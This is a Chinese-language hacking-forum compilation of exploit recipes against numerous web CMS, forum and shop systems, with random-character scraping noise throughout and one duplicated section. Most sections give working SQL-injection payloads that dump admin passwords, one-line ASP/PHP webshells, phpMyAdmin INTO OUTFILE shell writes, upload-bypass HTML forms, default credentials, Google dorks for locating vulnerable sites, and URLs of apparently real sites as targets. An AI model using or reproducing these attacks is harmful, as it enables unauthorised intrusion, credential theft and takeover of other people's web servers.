启航企业建站系统 cookie注入漏洞通杀所有版本
8 R1 H7 w5 C, i& ^9 m8 X; r% @
: ?+ \! w. [9 Y2 H. b! l直接上exploit:
- t. l8 e9 L: M# g+ {( W8 ojavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
8 H! ]0 c# N2 b6 d* M Jtest:http://www.tb11.net/system/xitong/shownews.asp?id=210' {7 `0 h9 D! i2 H; P4 B/ X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 _% K2 U1 H- [0 N" p# j- \0 y
Asprain论坛 注册用户 上传图片就可拿到webshell4 p8 ]9 r' D1 Z$ E0 i7 h0 \, l- g
/ x. z% u& V7 f) A. G- s6 WAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。3 J3 q" f; H! [2 R# @
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>9 A) R3 ]/ Z( |1 }, I' g
2.gif 为一小图片文件,一定要小,比如qq表情图片+ }3 P. y+ k% U: R8 Y5 u+ W1 I
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用% T m+ M2 }) y: v
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
# u. g1 p" k2 C; C5.q.asp;.gif0 C5 ?, H4 Q. r! r$ P- `/ p% \
google:Powered by Asprain
8 m# L+ M9 g- H1 W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* \( n4 O$ T' a4 C3 y
/ U/ Z# g. X: u f
ShopNum1全部系统存在上传漏洞。# M: A# D! p! f# P& U
( @4 l0 m' V9 T( M: u% ?
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。 h3 L0 Z; E" J ?5 u* C
按说明 提示登录后台。。
5 j7 ]* z1 c4 O) s, O" I" o: W在后台功能页面->附件管理->附件列表
9 w) N. x+ @4 s可以直接上传.aspx 后缀木马0 {5 e8 r" @8 T' I+ i
http://demo.shopnum1.com/upload/20110720083822500.aspx7 O! h1 ]" N' M, F3 L/ o8 _; ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ V% D3 o, d% G# S) W, ?4 p+ l7 ?* z( u+ T2 ?1 @
牛牛CMS中小企业网站管理系统 上传漏洞$ H7 J0 |9 K' m$ I& h! J
% J% T* V4 h1 n$ p! |牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。9 A7 p- n& T' k1 {, }
后台:admin/login.asp
+ s* [3 b! t6 N a' j4 tewebeditor 5.5 Nday
^+ R( i. v/ z* F# ~* T2 vexp:4 X( D1 ~, H' Y7 s7 M
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
2 ^8 p" {8 m( \5 H' ^<input?type=file?name=uploadfile?size=100><br><br>?# j6 b; B0 t3 D: J, A1 I L
<input?type=submit?value=upload>?
: g1 @- p/ z# q/ t- ~</form>
. W# F h: C# ips:先上传小马.$ V( j& c6 [+ |# n) X
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
7 G! [+ p6 ]" x& U h% ~0 D
& u: ~$ P# }$ R5 i/ M--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& y; u- J/ K* o: X4 g3 F+ `- i3 F/ `
1 q+ ~7 x3 E/ @0 b; m2 l% a, DYothCMS 遍历目录漏洞
# j* S# x* Z& i* \2 ^' L) |8 M+ p( w7 b: F+ F0 l2 N5 M
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
" F+ J6 S* r! I9 x9 q+ z默认后台:admin/login.asp# ]2 ^$ g% T& U2 [* ]7 P
遍历目录:
: c# I7 |8 d* T- B/ @ewebeditor/manage/upload.asp?id=1&dir=../
$ }+ A. x3 O- x* ?) o; Idata:
; [4 i% {" a& K' O; O) c4 `http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa# S2 n0 v( y+ M" t$ Q1 l; c8 ?0 K
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 B6 G. a' f8 w( R5 \. m2 |0 ?9 \* p
Q o3 [4 y8 lNet112企业建站系统 1.0# L( _# l" L% {6 A& m! m
$ A, v2 o/ n$ f- k e4 t) F1 F
源码简介:4 E5 j' M( s, a, E6 h: y6 t
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。4 f* h/ l: s- Q% X
添加管理员:5 [# z; V( n8 _& N
http://www.0855.tv/admin/admin.asp?action=add&level=2
2 w; m: |: Q( I4 C# C* l其实加不加都不是很重要,后台文件都没怎么作验证。2 D8 S! i9 L a& h/ i
上传路径:
4 K( \- @3 ?- c6 F2 E% D$ t9 `http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
( V& `' s4 I- w: X7 ]; ] t; Zhttp://www.0855.tv/inc/Upfile.asp?Stype=2+ r3 k$ e) ^8 E, v. z/ q9 [9 ^7 m2 Q
怎么利用自己研究。 |8 N: [6 P" i1 P, A7 O% p
遍历目录:
3 {( m4 J$ r; g4 W7 y$ dhttp://www.0855.tv/admin/upfile.asp?path=../..
2 _7 L3 O) n% B# |/ v$ ^# ^如:5 h; W8 ?8 {8 ?- V- }" C- X, Z4 W
http://www.0855.tv/admin/upfile.asp?path=../admin
1 ?* X; g$ k' y+ L8 ]http://www.0855.tv/admin/upfile.asp?path=../data/ H# z& w6 B- h: g2 E
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 v( t: U6 E0 X- t b$ b
* H1 S3 X3 F) `: f( M9 X
易和阳光购物商城通杀 上传漏洞4 U& ?) N; g! G* z0 K$ u! m
+ ?8 w& s, }& L( j( o
前提要求是IIS6.0+asp坏境。% g7 f- i$ G6 T, w' Z. _7 K* H: J
漏洞文件Iheeo_upfile.asp
; }* ?4 p" \ ^* u) F0 i) ~过滤不严.直接可以iis6.0上传
I& n& A( Z- @9 p把ASP木马改成0855.asp;1.gif& T9 t2 R) G7 \; _/ W: E O: f
直接放到明小子上传* j7 g+ Z6 ^9 L- A# }
Google搜索:inurl:product.asp?Iheeoid=! H9 D4 O* A( a3 j" _
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
H- y- h2 n, H; }# C" o' L* M8 @
% H/ c" a' O; u& V8 A$ k* qphpmyadmin后台4种拿shell方法* @% v# b- @4 A( K* i
4 b" _2 x1 E7 o+ y+ t& u方法一:
8 s: P$ ~/ Z; L% ?- D2 v; D1 UCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );2 d; H! D! y4 p/ M" G: O6 v
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
4 `, A( O$ R5 ^1 l1 NSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
* s9 k) g! a( ^9 a* Q3 ~, D----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php% D, z3 A X' c0 g
一句话连接密码:xiaoma& C+ @, I5 a/ g+ m# C
方法二:6 i1 D. S, y+ Z. \, _0 B
Create TABLE xiaoma (xiaoma1 text NOT NULL);0 l3 l) f" q% j+ Q8 @' x
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');. R! G$ c' w9 a* r7 j& h! Y% I
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
+ O- C- ^' j2 g; lDrop TABLE IF EXISTS xiaoma;
7 W# m: f/ l8 o% \7 q* n$ l, F方法三:
! E) u8 d U( O' v9 r读取文件内容: select load_file('E:/xamp/www/s.php');
6 ~& y" P* b+ ]. l p% p5 w$ L写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'- {$ [' L* a* f4 `2 y, e; z
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php') S5 N1 c& }* V+ m* x
方法四:. }* @. Z. {- u3 H5 r0 R
select load_file('E:/xamp/www/xiaoma.php');
6 o, L1 R! `9 H" U8 j! P7 [) a/ qselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
0 S5 S% v: c; m, b. I7 E然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir# B5 P" \# z+ x/ M( F9 f8 H
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 k. B' J2 V9 ]* p9 R* b s' \9 L2 D0 E5 t) H
传信网络独立开发网站源码0day漏洞4 r) b; r% F2 U- R
( _0 H0 ~4 l: ?& e3 J& o7 N' b
后台system/login.asp
2 N$ ?; x/ G! j2 z进了后台有个ewebeditor: }1 `* w [6 o) y/ G& @
Google 搜索inurl:product1.asp?tyc=. v2 t5 ~; g4 g& `9 Q
编辑器漏洞默认后台ubbcode/admin_login.asp
4 Z8 P# ^( I7 n: ~数据库ubbcode/db/ewebeditor.mdb# U; f; Q5 D8 G4 J) t
默认账号密码yzm 1111115 A& m8 W# ~2 J! |$ r
" |, M$ @1 J0 @" a* y- N拿webshell方法
& m" T# P# [, v6 K) `6 K1 f1 e; V登陆后台点击“样式管理”-选择新增样式
8 _1 m0 p9 n0 w, `5 `样式名称:scriptkiddies 随便写 ) B% |* G, q S5 c, E7 n
路径模式:选择绝对路径 5 d9 o: K/ |5 v9 Q
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
6 u( }1 L( ~9 L: ~+ `% f图片类型比如就是我们要上传的ASP木马格式
" H6 Z( Q& o3 b上传路径:/
! O0 I) d j2 |. o2 U图片限制:写上1000 免的上不了我们的asp木马) R4 h @7 R! j! H; g
上传内容不要写
3 [1 x# \% E8 \* w6 V可以提交了
1 B3 y: O% ~' h0 Y( n/ v) |; q样式增加成功!
: f% D" m( f: p4 P, o1 d返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
9 K" v0 h! s+ v& V$ J按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
) e8 C; E5 C3 B' B- Q网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
0 h9 J8 T" W; A0 ?: u' R& w上ASP木马 回车 等到路径: ?3 x0 y/ ` j4 L z2 s2 {& b
Z$ L; Z; L8 V( Z, Y后台:system/login.asp+ h2 X- M4 J3 T
Exp:! G5 M4 m: W3 U" U8 ?2 p# e
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 ^: ?3 \1 W! X& w* e6 v! e测试:
+ a8 e) T4 j J4 V5 yhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
# L' o8 B% {! ?5 hhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
9 F" } D; e. _/ B2 M--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% M; H: p% T& W/ ?( X" e
% j v1 }6 g2 _& M9 J1 @foosun 0day 最新注入漏洞
/ n" a* o4 a; q2 T5 ?) }' [5 ^: t4 b
( D1 Z' f) k8 e+ u/ h6 ~- s3 f漏洞文件:www.xxx.com/user/SetNextOptions.asp0 c3 k% x( q& |$ n: s
利用简单的方法:7 \! h+ y% @8 |9 o$ _$ X$ u
暴管理员帐号:5 v. ~; H# ^; u2 K" t; U
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
" U2 D; i& [, X# }暴管理员密码:
% g+ |7 k: C8 c& }1 qhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
0 f: Z ~# J2 ^1 o. Q8 R--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 O( g3 J# {& \$ W7 e6 }3 H
- k k- V8 D n* \' `3 v( B0 ]
网站程序的版权未知!
! l g4 C+ l: x/ I- O0 i' W- s g$ T" L1 t$ W
默认网站数据库:9 i, E4 n- ?0 v. ^9 k
www.i0day.com/data/nxnews.mdb" I$ H- ?" i3 ]: w/ G$ p( g* v
ewebeditor 在线编辑器:0 G( ^, l" Y& t' S/ E7 p
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb1 H1 b) U: L9 a& r0 {
登录地址:ewebeditor/admin_login.asp+ n5 U W$ F4 G- F( a, t/ i. H; P1 r
默认密码:admin admin
) U* l8 }( d0 o8 I2 V登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
. ?$ u% E+ r' I
6 z X% [: ]. e) ?" T! b- T0 r2 W5 SSql注入漏洞:# j7 r" g1 c& }$ J! m7 e
http://www.i0day.com/detail.asp?id=12
/ ?, g1 ~! |' P, U: fexp:* G% x1 R# `- Z J
union select 1,admin,password,4,5,6,7,8 from admin, f6 m2 V( D4 ~) G
爆出明文帐号/密码
2 a- q0 H, C, a, ]8 p8 H" ]8 C7 P- _4 b F5 A6 G) Z
上传漏洞:
) @1 S/ F! ^# s, B+ X8 |* z" B后台+upfile.asp
9 M. {9 B1 C/ n: U* F/ n如:& h, s, ?; r4 R# C6 C" K3 O. d
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
& \4 L8 L1 C; j/ r8 e# Ashell的地址:网址+后台+成功上传的马
6 e. p5 ]2 d! L7 a$ S# ~/ hgoogle:inurl:news.asp?lanmuName=
4 R8 W. T0 @# w0 {------------------------------------------------------------------------------------------------------------------------------------------------------------------------( P0 l" A/ h3 E7 Q+ ?
5 ]& m$ H6 r0 Ldedecms最新0day利用不进后台直接拿WEBSHELL9 Q- _7 v: X8 n0 v: B1 ~8 Y
, K4 l% U9 L) t* ]) v# J6 Z4 H
拿webshell的方法如下:
/ R0 t* C& I( P# h+ Y# j' m8 L: H网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
- K9 [$ y/ P9 {; h( R1 g( h w前题条件,必须准备好自己的dede数据库,然后插入数据:
1 n' G& v$ V( @6 F/ A7 t L/ |insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ]3 Z1 J+ E% D
$ _( K" M8 H" `% w) {
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。8 ` O) Q" e/ h# l( ~( D% ~
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
4 x/ g6 h, Z: P<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
_0 q$ Q! p b, s<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />2 Q' N$ G% w& \) l
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />: i: Z- i3 S$ p& G% J' h: `1 B
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /># }0 b* d1 X' Q5 G \2 H& l
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
, Q2 [( w" `+ x. H3 d. k, e<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 {" O3 `0 V; o* q7 b9 E1 d# S3 N<input type="text" value="true" name="nocache" style="width:400">; M: ` e" s* R# T
<input type="submit" value="提交" name="QuickSearchBtn"><br />* D; M. t' Y1 Z5 S3 Z
</form>
: O! h: g" O* V/ L7 V6 J/ \# @. j<script>
1 W; T z! ?% f; l# t% j2 d, n1 ]function addaction()
1 P, l. e0 ] E# w5 _' ]5 {9 f5 ^{- d2 Z8 k- n) j4 a" `+ K
document.QuickSearch.action=document.QuickSearch.doaction.value;
: n3 _- f6 x. Y/ E% Y( ~$ `8 c3 f}2 C2 C8 D q' e0 {+ u; B: L
</script>( O) s- E, H7 q" u+ q9 \ ]" J, X
-----------------------------------------------------------------------------------------------------------------------------------------------6 p; T) ?0 M$ z6 W' ]1 a2 M6 g
' `+ c" b, S( g" x6 V0 ? @
dedecms织梦暴最新严重0day漏洞
9 Z% L |5 s( ?7 s; t8 k" ^: @" a9 Fbug被利用步骤如下:) C: e4 M8 d6 j. O$ V) ^7 h: e
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root: V6 ^/ P3 [* O6 z6 k- F
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。! ^2 Z+ G+ _: w& K
-------------------------------------------------------------------------------------------------------------------------------------------
# h/ }: `" m8 W8 R( V9 s7 E0 z& y" g* B0 F$ T0 K( T( G
多多淘宝客程序上传漏洞
' R# ^ v1 w. A" }8 y$ M漏洞页面:
8 `5 F# b5 S8 V5 C( jadmin\upload_pic.php2 c) J7 Q* [3 j* Y1 _
传送门:
m6 Y+ u( v! f, |; _4 j9 Shttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
: C% K( G2 X3 `/ C" n8 P8 P, s# ~* EPS:copy张图片马 直接 xxx.php 上传抓包地址!
" H* W" D$ i0 l+ U------------------------------------------------------------------------------------------------------------------------------------------------------/ Y8 L5 d3 z' e( t7 ^! J
) M2 t5 B) H9 u" q无忧公司系统ASP专业版后台上传漏洞
* s. i: w7 u" p- q) f3 s7 k漏洞文件 后台上传* N ~- N. H C
admin/uploadPic.asp
& N- w+ Q3 z7 H$ y# p漏洞利用 这个漏洞好像是雷池的
Y5 M# a# L# T7 h7 H1 Jhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
& b' d- @9 h4 }" Y4 d等到的webshell路径:
% O9 u. ^4 f b, p' {) J/UploadFiles/scriptkiddies.asp;_2.gif& x4 \5 D, y" f' c' n: ?4 L3 ^* u! }! r5 U
---------------------------------------------------------------------------------------------------------------------------------------------------) D1 w5 S4 | \ `2 j: B5 E' O9 i, s
' J: y$ n E9 e$ l2 t- r2 l住哪酒店分销联盟系统2010
) {# V0 Z8 X0 `" K! N9 P# rSearch:" ?- s8 R/ N' Z$ L) D
inurl:index.php?m=hotelinfo. D" d: a, V$ `0 w
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin3 f( M0 d- w$ w q* R d
默认后台:index.php?m=admin/login4 n; z: \6 _2 z2 _0 ]/ `
--------------------------------------------------------------------------------------------------------------------------------------------------/ u1 W8 D- ~5 e
8 L5 E. Q5 k( b
inurl:info_Print.asp?ArticleID=: j: R$ x# x( f5 T: g" U
后台 ad_login.asp' l% g$ L( v: }' |! J4 U
爆管理员密码:/ R: j, B- M& N
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
0 O* U5 d) o4 y( |8 R5 Q/ ^/ ]: ^------------------------------------------------------------------------------------------------------------------------------------------------------------/ ~8 ?! G4 ~: G9 P, Y
# D' \. r! a- ^" g& q5 `" D
搜索框漏洞!
7 Z. _/ L n7 O, F%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='4 N5 Q1 g2 Z7 _3 s9 i' V2 J0 o
--------------------------------------------------------------------------------------------------------------------------------------------------------/ l6 u' |- }4 i- z" p% Z; z) s/ r, o
4 q7 d7 `! \' E5 J
关键字:
: E; i% D$ v/ Z. L( a+ W# `inurl:/reg_TemletSel.asp?step=2
2 s; o S! P5 v9 \" I或者
+ k5 I4 f* {' n& u& Y# A% A5 U电子商务自助建站--您理想的助手6 J0 H. q' } ~5 n3 S. f
-------------------------------------------------------------------------------------------------------------------------------------------------
9 ]% H7 r7 K; O' I4 [* ?* |9 y7 y9 j( X1 W0 M% E
iGiveTest 2.1.0注入漏洞7 E0 `3 k# P7 n d
Version: <= 2.1.0
/ D0 n7 x& E P7 g b+ | A1 e# Homepage: http://iGiveTest.com/5 y: j; c$ _ a2 b
谷歌关键字: “Powered by iGiveTest”! w7 M1 p* ?! D- j" I
随便注册一个帐号。然后暴管理员帐号和密码
7 I! U' R i2 u+ i* H& `8 Ahttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1: w# s3 v: G# C+ l
------------------------------------------------------------------------------------------------------------------------------------------------
! H# s0 W/ ?5 {2 F/ ]" A, j' @' s- _' h, t4 J
CKXP网上书店注入漏洞7 ?! {, O8 M3 f8 ^) V$ [$ P
工具加表:shop_admin 加字段:admin
% f% D7 {. o' H# z x后台:admin/login.asp 1 E. u( e0 ` l- ]/ _7 @: }& V
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/& C9 h) ?6 h. o* ?
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
+ x9 A; J3 b6 X+ R--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 u: q8 } ]( l
8 ?( }' H3 K% t H* a k# C
段富超个人网站系统留言本写马漏洞( X& I: n8 Q- [( C# c
源码下载:http://www.mycodes.net/24/2149.htm0 A: L- X) P+ l) q3 i2 ]1 x$ [. p/ z, x
addgbook.asp 提交一句话。2 O; v! r; A5 r
连接: http://www.xxxx.tv/date/date3f.asp
d. S \- K8 igoogle:为防批量,特略!7 E# R; i7 r: F5 U+ W) O* o* {
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 J8 N: w9 I# f! b' z7 M- t
5 n, M4 ~6 m9 A6 } u3 \智有道专业旅游系统v1.0 注入及列目录漏洞3 [" P3 E" A7 k7 V- z$ M; [: f8 Q
默认后台路径:/admin/login.asp9 R1 }1 J. I; x' N ^
默认管理员:admin
) \3 [, J: Y! l! S3 m默认密码:123456
5 q ] G$ V- Z; ^8 ?SQL EXP Tset:: G5 a; T! U# B3 e2 E% o3 `2 [! a
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin2 `/ f7 ]0 ]: [9 {% i0 A$ s
------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 q" Z# u# N! I+ n1 _
; u. {8 P" u2 X; K9 `. i) Bewebeditor(PHP) Ver 3.8 本任意文件上传0day
8 I% x) k6 k$ M q7 BEXP:
+ A" J- H$ z' v: C! Y$ V- O6 i9 S: X<title>eWebeditoR3.8 for php任意文件上EXP</title>
+ L; W5 B3 U$ k3 p& k8 g2 r# x. M5 Y<form action="" method=post enctype="multip
) `9 S( p' \8 S8 t/ e8 Aart/form-data">
( L4 ^0 U+ d* q9 X0 Q4 I<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
3 M$ _, G0 ?# j; s- F ]URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
0 _7 _2 M" k! u$ M<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> ( O" s+ v2 m; P% n+ ?9 y
file:<input type=file name="uploadfile"><br>
% q4 n" ?1 ^% l# O<input type=button value=submit onclick=fsubmit()>
' `& a& I) v5 X; K" w+ K6 i</form><br> ( v4 `. N0 S6 N! \0 J+ j' T0 A
<script>
9 h6 H$ @. K: W, H Tfunction fsubmit(){
, V1 _- r/ b; u8 Eform = document.forms[0];
- Q% Z3 Q0 u* K: {+ g- P- H7 Cform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; : E, n0 {) A$ Z% P& W
alert(form.action); 1 y9 v; f5 [0 U6 \) s) L
form.submit(); 1 e9 B5 x; J7 s; C
}
5 O& L" W) x' F; U6 z</script>% n) `1 b, Z/ d( `, K$ j
注意修改里面ewebeditor的名称还有路径。
/ m6 c) J& U2 Y& Q; O---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 X4 Y( @ M: x0 J6 z8 l: V% ^
& t3 Q; f9 Q6 t( ?' }- v8 x提交’时提示ip被记录 防注入系统的利用4 u: i* {8 T* v9 ~
网址:http://www.xxx.com/newslist.asp?id=122′1 \5 T7 X9 B9 I, \ ^
提示“你的操作已被记录!”等信息。8 w/ Z8 G7 z! S/ k2 p3 D
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。: S( ~& `4 p' \
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------. z8 d8 ?% h0 p
# M; I s! \+ _5 e: T7 q. w
西部商务网站管理系统 批量拿shell-0day
& z7 z+ ]' m; G( F这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 3 c }0 |' [0 W8 j+ E& E2 ~
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
! p7 m3 e$ n8 ?2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合, C5 w7 h: B7 r+ O; m0 L: h
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂3 X; K+ {! V; l5 i' a
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 q$ x7 _+ [' _" K' Z. _
, J& S9 @- H) \8 a. F1 ~
JspRun!6.0 论坛管理后台注入漏洞
. P S8 B# f0 \5 B0 c& F1 i+ W0 z7 V( Y% K: j
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:7 S% x; i) I |6 m( ?7 R
JspRun!6.0
' u$ T: ~, h) ]7 f0 Z" b漏洞描述:
! q' M( }! t( B* v% m& ]JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
( e7 N* F' i) C. Z0 n8 D在处理后台提交的文件中ForumManageAction.java第1940行
3 E0 \& {2 J: I- RString export = request.getParameter("export");//直接获取,没有安全过滤
3 k# {4 K2 Z$ n- oif(export!=null){; {1 n" Z3 z) c6 [7 K
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
) r4 I& G4 \, V) Xif(styles==null||styles.size()==0){' O' C! h; n9 V. `6 F
<*参考+ o2 [7 }! D5 Z
nuanfan@gmail.com
! t, p7 I# x3 J+ f2 \*> SEBUG安全建议:
& z8 }4 G# E$ J+ X9 T" `! g0 swww.jsprun.net
3 { ^% S) V5 B6 x1 r8 c2 z(1)安全过滤变量export$ S( c$ I1 [0 N& S. w5 K
(2)在查询语句中使用占位符
' X0 _- k; E/ W) a; N------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 m p6 ]' k: q8 |; Y( O. ]) ?
4 w b" C$ _ w; v9 g) _乌邦图企业网站系统 cookies 注入
! y1 Z& i7 F& H$ j& e; ^/ X3 A1 G3 F& ~1 D* O* A Z6 H9 U/ t
程序完整登陆后台:/admin/login.asp
( n( n2 a' p' N$ I默认登陆帐号:admin 密码:admin888
8 D1 R. [* [* E2 y, B. a) u语句:(前面加个空格)
2 M5 @; X1 V% m- M" qand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
, O( c, q3 D- m+ T( s* c4 t( i或者是16个字段:# J' G& M6 l: s; M5 F1 h( \0 ~
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin/ j$ Y& p4 g; e M- x* Z
爆不出来自己猜字段。& \ C$ L* X7 U0 ?0 b7 K; I. _; i m
注入点:http://www.untnt.com/shownews.asp?=88; Y3 E2 ~5 Y* |5 m
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp( T! @+ B E. d6 F y% g- F- f7 X
关键字:# R1 z F ~ h
inurl:shownews?asp.id=
7 a7 O) P4 B! U' P-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* t" p1 R1 v& C* E: F- |- {7 O$ C% M. x2 d
CKXP网上书店注入漏洞
( n& Q5 L" ~) T
( k2 P" S: Z! h' P- S5 o工具加表:shop_admin 加字段:admin0 d( p$ y: ?5 J3 ~
后台:admin/login.asp
& N. W; x# T) a! z登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
6 a7 w& }9 ?* p/ Xinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息' f0 f# I3 c/ O2 t- U
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------& N4 v7 o" \. H4 L* C6 {( t' \3 k
